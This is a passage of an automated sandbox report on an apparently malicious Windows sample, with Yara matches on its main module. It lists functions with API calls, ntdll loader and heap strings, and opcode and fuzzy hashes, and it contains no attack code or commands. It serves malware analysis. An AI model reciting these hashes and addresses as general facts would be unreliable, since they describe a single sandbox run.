                                                                • Instruction Fuzzy Hash: C690026120240003450972584514616501A97E0201B55C121F1019590DC62589927225
                                                                Function 01122DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: b5bd61b1da55638604b28812931f6a04a37d5e5e64c3475905505c7bd36a9322
                                                                • Instruction ID: e1fddb673f2be0ca53276839bd452b7e5ad0cdb08347af23e11e74a71b5f025b
                                                                • Opcode Fuzzy Hash: b5bd61b1da55638604b28812931f6a04a37d5e5e64c3475905505c7bd36a9322
                                                                • Instruction Fuzzy Hash: 1190023120140413D51572584604707101997D0241F95C512B0429558DD7568A53B221
                                                                Function 01122C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 133 1122c70-1122c7c LdrInitializeThunk
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 510f6348a4ccee0e48eae253c6976a8b75c3c88d2b689bd26606c9c11393122d
                                                                • Instruction ID: c099d50911fa8e872c9bffbfd2fd4f2f1ed6e56d4b24c3ad2f10dfb057adc6d6
                                                                • Opcode Fuzzy Hash: 510f6348a4ccee0e48eae253c6976a8b75c3c88d2b689bd26606c9c11393122d
                                                                • Instruction Fuzzy Hash: 5090023120148802D5147258850474A101597D0301F59C511B4429658DC79589927221
                                                                Function 011235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 3045e752591c9302c174fda39f03668ae5ab675ae19d6606bbaf77d6a25a7495
                                                                • Instruction ID: e03dd4fa2bf916ffef11fa46db0b4445a30cf07117a34fe683369122f974121b
                                                                • Opcode Fuzzy Hash: 3045e752591c9302c174fda39f03668ae5ab675ae19d6606bbaf77d6a25a7495
                                                                • Instruction Fuzzy Hash: 7490023160550402D50472584614706201597D0201F65C511B0429568DC7958A5276A2
                                                                Function 00413C35 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69threadwindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • PostThreadMessageW.USER32(267_8V0-3,00000111,00000000,00000000), ref: 00413D10
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_r9856_7.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 267_8V0-3$267_8V0-3
                                                                • API String ID: 1836367815-80812108
                                                                • Opcode ID: 175d564f5e2082ac18ee0e7691373d5f1b56a62285362adcd5aaadc332369405
                                                                • Instruction ID: 64a1c55ae4458a7ebde12d920371f3fbb3e1541addc965c4ee9526edd9f5af75
                                                                • Opcode Fuzzy Hash: 175d564f5e2082ac18ee0e7691373d5f1b56a62285362adcd5aaadc332369405
                                                                • Instruction Fuzzy Hash: 46115976E41218B6EB119A61DC42FDF7738EF81B05F104116FA047B280DA7D5B478BD9
                                                                Function 00413C8E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58threadwindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • PostThreadMessageW.USER32(267_8V0-3,00000111,00000000,00000000), ref: 00413D10
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_r9856_7.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 267_8V0-3$267_8V0-3
                                                                • API String ID: 1836367815-80812108
                                                                • Opcode ID: b383dde672c82152daf3adc989a2d52c6e04e1b3a4d4eea0f2877e6736f2a2da
                                                                • Instruction ID: c40ebb111a8a715863815cf4496bd2e0fb54e4ca61a74a22b54d82e536711eed
                                                                • Opcode Fuzzy Hash: b383dde672c82152daf3adc989a2d52c6e04e1b3a4d4eea0f2877e6736f2a2da
                                                                • Instruction Fuzzy Hash: AB01C471E4121C76EB21A6A1EC02FDF7B7C9F41B54F408059FA047B2C1DAB85B068BE9
                                                                Function 00413C05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • PostThreadMessageW.USER32(267_8V0-3,00000111,00000000,00000000), ref: 00413D10
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_r9856_7.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 267_8V0-3$267_8V0-3
                                                                • API String ID: 1836367815-80812108
                                                                • Opcode ID: 041c11d9e3d76dae7882dd25903fd7fc32e1bfeb54af03b1b2463dd5f3996b6f
                                                                • Instruction ID: 53729975d2a338d524775e00a2ac67219866912073ee76492545882c7dd24e85
                                                                • Opcode Fuzzy Hash: 041c11d9e3d76dae7882dd25903fd7fc32e1bfeb54af03b1b2463dd5f3996b6f
                                                                • Instruction Fuzzy Hash: 4F012876E4121C76EB115A60EC42FEE7738DB40B14F104156FA047B280DABC5B434BE9
                                                                Function 00413C93 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • PostThreadMessageW.USER32(267_8V0-3,00000111,00000000,00000000), ref: 00413D10
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_r9856_7.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 267_8V0-3$267_8V0-3
                                                                • API String ID: 1836367815-80812108
                                                                • Opcode ID: b0ebadb5fd88ebcf16d0396ae12c086fd1e541105adeb7f4411a79110bfdbe48
                                                                • Instruction ID: 47ea1f5e56f9ef20a05aaeb14bb72dfade306cd9e52b05be9252b63486a43c03
                                                                • Opcode Fuzzy Hash: b0ebadb5fd88ebcf16d0396ae12c086fd1e541105adeb7f4411a79110bfdbe48
                                                                • Instruction Fuzzy Hash: 3C01C471E4121C76EB21A6A1DC02FDF7B7C9F41B54F408059FA047B2C1DAB85B068BE9
                                                                Function 00413C56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54threadwindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • PostThreadMessageW.USER32(267_8V0-3,00000111,00000000,00000000), ref: 00413D10
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_r9856_7.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 267_8V0-3$267_8V0-3
                                                                • API String ID: 1836367815-80812108
                                                                • Opcode ID: 64d6d23424cda9bd292b8a01f346871d295395acc8c8e010082edef8171e7532
                                                                • Instruction ID: 627cb6a46820866e8219f820b20d9fcefe651603c060f43430c188a1977f0bc0
                                                                • Opcode Fuzzy Hash: 64d6d23424cda9bd292b8a01f346871d295395acc8c8e010082edef8171e7532
                                                                • Instruction Fuzzy Hash: 2A01F532E412187AEB209A51EC42FEE7738DF80B14F10415AFE047F180DABC5B068BE9
                                                                Function 0042C523 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 84 42c523-42c567 call 404993 call 42d413 RtlFreeHeap
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,79D5A5E9,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C562
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_r9856_7.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID: NaA
                                                                • API String ID: 3298025750-4168634936
                                                                • Opcode ID: cdb08e162a59f461f5c0758b26e2b7ea4b3bc2c575326eb3f8343fb19424bd28
                                                                • Instruction ID: 125ac613e3448fdc8d344241a0261a98f02f94ede327a10ddf49b6c73944c2bf
                                                                • Opcode Fuzzy Hash: cdb08e162a59f461f5c0758b26e2b7ea4b3bc2c575326eb3f8343fb19424bd28
                                                                • Instruction Fuzzy Hash: 5AE06DB16002147BD624EF59EC41FAB33ADEFC8710F004429F908A7241CA71BA1186B8
                                                                Function 0042C4D3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 113 42c4d3-42c514 call 404993 call 42d413 RtlAllocateHeap
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000104,?,004245CF,?,?,004245CF,?,00000104,?), ref: 0042C50F
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_r9856_7.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: f58efcd96ee5265a0f30371f38f36ad268c7dfb1e073293d613f1df82db96e02
                                                                • Instruction ID: 8ff4b5c7c022d6afe738a04b4fb30dac1cb055ee5dbb4713f718898a2a5f8ba1
                                                                • Opcode Fuzzy Hash: f58efcd96ee5265a0f30371f38f36ad268c7dfb1e073293d613f1df82db96e02
                                                                • Instruction Fuzzy Hash: D7E06DB12002187BD614EF99EC45EDB33ADDFC9710F004029F908A7242D671B91086B4
                                                                Function 0042C573 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 123 42c573-42c5af call 404993 call 42d413 ExitProcess
                                                                APIs
                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,C994D8EC,?,?,C994D8EC), ref: 0042C5AA
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_r9856_7.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExitProcess
                                                                • String ID:
                                                                • API String ID: 621844428-0
                                                                • Opcode ID: 1207cdd213cf8d40fa9f237ebab61f909268e99a71d720dcaae4ce794a3ef236
                                                                • Instruction ID: 056d491909c396a3ef4edee54b1a6656861ae065c4da94b9a7d16b1326ea1db9
                                                                • Opcode Fuzzy Hash: 1207cdd213cf8d40fa9f237ebab61f909268e99a71d720dcaae4ce794a3ef236
                                                                • Instruction Fuzzy Hash: 13E046762102147BE620BF6AEC05F9B776CEBC9714F00482AFA08A7281D675B91187B4
                                                                Function 01122C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 128 1122c0a-1122c0f 129 1122c11-1122c18 128->129 130 1122c1f-1122c26 LdrInitializeThunk 128->130
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 1d856636aabe3af2ce5659c8968ae72e10f1beaad2718cf3e32a47e30b6cb8f3
                                                                • Instruction ID: 26863c7f17c253638e8827030bdf1c7c95de8afc2856a452c68058eab99d2550
                                                                • Opcode Fuzzy Hash: 1d856636aabe3af2ce5659c8968ae72e10f1beaad2718cf3e32a47e30b6cb8f3
                                                                • Instruction Fuzzy Hash: CAB09B719015D5C5DE15E764470871B791077D0701F25C161E2034741F4738C1E1F275

                                                                Non-executed Functions

                                                                Function 01162349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-2160512332
                                                                • Opcode ID: 484f4a05368055cc714462b8ec982517464df39daf8cb2f78f2a0363e9c11212
                                                                • Instruction ID: f7684150457b6e34ee95daffd9a1ff61cd6c0a4d8fa3ccdd49fe79f2b31f1298
                                                                • Opcode Fuzzy Hash: 484f4a05368055cc714462b8ec982517464df39daf8cb2f78f2a0363e9c11212
                                                                • Instruction Fuzzy Hash: 36928D71604742AFE729CF28C880F6BB7E8BB84754F04492DFA94DB290D775E854CB92
                                                                Function 01118620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Critical section debug info address, xrefs: 0115541F, 0115552E
                                                                • corrupted critical section, xrefs: 011554C2
                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0115540A, 01155496, 01155519
                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011554E2
                                                                • undeleted critical section in freed memory, xrefs: 0115542B
                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011554CE
                                                                • Critical section address., xrefs: 01155502
                                                                • double initialized or corrupted critical section, xrefs: 01155508
                                                                • Address of the debug info found in the active list., xrefs: 011554AE, 011554FA
                                                                • 8, xrefs: 011552E3
                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01155543
                                                                • Thread identifier, xrefs: 0115553A
                                                                • Critical section address, xrefs: 01155425, 011554BC, 01155534
                                                                • Invalid debug info address of this critical section, xrefs: 011554B6
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                • API String ID: 0-2368682639
                                                                • Opcode ID: 0ecf7460d0403c387b596d9eb6a6fb4aca91834cac7d8111468f985bcec43df3
                                                                • Instruction ID: 12cf13c145b5e811ed4c287472b155de9cf42ac40faee1a6d5116db5e231e445
                                                                • Opcode Fuzzy Hash: 0ecf7460d0403c387b596d9eb6a6fb4aca91834cac7d8111468f985bcec43df3
                                                                • Instruction Fuzzy Hash: 2B81B2B0A41358EFDBA8CF99C840BAEBBB5FB08B04F10811EF954BB241D375A941CB54
                                                                Function 011129F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01152602
                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01152498
                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01152409
                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01152506
                                                                • @, xrefs: 0115259B
                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0115261F
                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011524C0
                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011525EB
                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011522E4
                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01152624
                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01152412
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                • API String ID: 0-4009184096
                                                                • Opcode ID: 07b7cdaf2b73e0d24e4c20a11a3a6935ede9415172fa0d5d9161380b47fe48ba
                                                                • Instruction ID: 82125bcbcd40db45198a72ba85f55473e6522a377430422fb4a5d548011f02cf
                                                                • Opcode Fuzzy Hash: 07b7cdaf2b73e0d24e4c20a11a3a6935ede9415172fa0d5d9161380b47fe48ba
                                                                • Instruction Fuzzy Hash: 0F028FB2D00229DBDB69DB54CC80BD9F7B8AB54304F1141EAEB49A7241EB309F84CF59
                                                                Function 01188B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                • API String ID: 0-2515994595
                                                                • Opcode ID: c60793308c3ce5829545391a3cfbd5b19ea547a89adaba84d67a5a9f185f5780
                                                                • Instruction ID: e8a7f3fcf21322242e366a6dfd931f635b2750d829493bb65a1dd3af09d894d2
                                                                • Opcode Fuzzy Hash: c60793308c3ce5829545391a3cfbd5b19ea547a89adaba84d67a5a9f185f5780
                                                                • Instruction Fuzzy Hash: B251CE715043119BC32DEF18C884BEBBBE8BFD4654F948A2DE999C3284E770D604CB92
                                                                Function 01190274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                • API String ID: 0-1700792311
                                                                • Opcode ID: 0c3c47d3ff68eab170234a4ce036977c075a26d6e0e9d4ddd5f40699a831e06c
                                                                • Instruction ID: 1938bf8db7feaf4a3cb1a44401c12d0379fa9d9f458a4325f59713251b49182d
                                                                • Opcode Fuzzy Hash: 0c3c47d3ff68eab170234a4ce036977c075a26d6e0e9d4ddd5f40699a831e06c
                                                                • Instruction Fuzzy Hash: 90D10B31601682EFDF2ADF68C440AAEBBF5FF4A704F098059F5A59B612C734A980CB55
                                                                Function 011689B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • VerifierDebug, xrefs: 01168CA5
                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01168A3D
                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01168A67
                                                                • VerifierDlls, xrefs: 01168CBD
                                                                • AVRF: -*- final list of providers -*- , xrefs: 01168B8F
                                                                • VerifierFlags, xrefs: 01168C50
                                                                • HandleTraces, xrefs: 01168C8F
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                • API String ID: 0-3223716464
                                                                • Opcode ID: ad25fb909078c9c8929f97223b3dfef63ed3cd373a1d4f9b389940df648abc4a
                                                                • Instruction ID: 1bbd59ec9fe85c30575e6de923fa4cf5ea3eb95d848c7f34c527f31882a554c3
                                                                • Opcode Fuzzy Hash: ad25fb909078c9c8929f97223b3dfef63ed3cd373a1d4f9b389940df648abc4a
                                                                • Instruction Fuzzy Hash: DD914871642716EFD72DDF68C880F9ABBADAB54754F05042CFA80AB240C772DC55CBA2
                                                                Function 010EEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                • API String ID: 0-1109411897
                                                                • Opcode ID: 6ba7161115149a05c7fdd654515bca5270e7c308ceefd8b20fc91d978ec9f4c6
                                                                • Instruction ID: e4eb067ab9d73550791769401684b65d20b7d842d6aac992ef11a947ffe9ac8f
                                                                • Opcode Fuzzy Hash: 6ba7161115149a05c7fdd654515bca5270e7c308ceefd8b20fc91d978ec9f4c6
                                                                • Instruction Fuzzy Hash: 53A25774A0562A8FDB68DF19CC987ADBBF1AF49704F1442E9D94DA7690DB309E81CF00
                                                                Function 011163FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-792281065
                                                                • Opcode ID: 9ab6fd6cad2f6caa6d319f1774e22078e7f7bb8cf27ac5a11df510b2ce79d82a
                                                                • Instruction ID: 427ab38404745818e2355960028d70d48cf2fd6de9604ba264937ddee60b2679
                                                                • Opcode Fuzzy Hash: 9ab6fd6cad2f6caa6d319f1774e22078e7f7bb8cf27ac5a11df510b2ce79d82a
                                                                • Instruction Fuzzy Hash: F0916B71B42721DBDB7DDF18D884BAD7BB1BF10B58F010138D9206BA84E7B19881C791
                                                                Function 010D645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01139A01
                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01139A2A
                                                                • LdrpInitShimEngine, xrefs: 011399F4, 01139A07, 01139A30
                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011399ED
                                                                • apphelp.dll, xrefs: 010D6496
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01139A11, 01139A3A
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-204845295
                                                                • Opcode ID: 46063abfc57cf4d251eae9bd942a6dc9a12dcb87d8da9adce8801ae97658d768
                                                                • Instruction ID: d137f6a7f659820ca579e6b983b489412f55d1054061b2e8a436c6cfad48d23b
                                                                • Opcode Fuzzy Hash: 46063abfc57cf4d251eae9bd942a6dc9a12dcb87d8da9adce8801ae97658d768
                                                                • Instruction Fuzzy Hash: B751E2712093099FD728DF28C881BAB77E4FB84748F000A2EF5D59B154DB71E945CB92
                                                                Function 01112674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RtlGetAssemblyStorageRoot, xrefs: 01152160, 0115219A, 011521BA
                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01152178
                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011521BF
                                                                • SXS: %s() passed the empty activation context, xrefs: 01152165
                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0115219F
                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01152180
                                                                Memory Dump Source
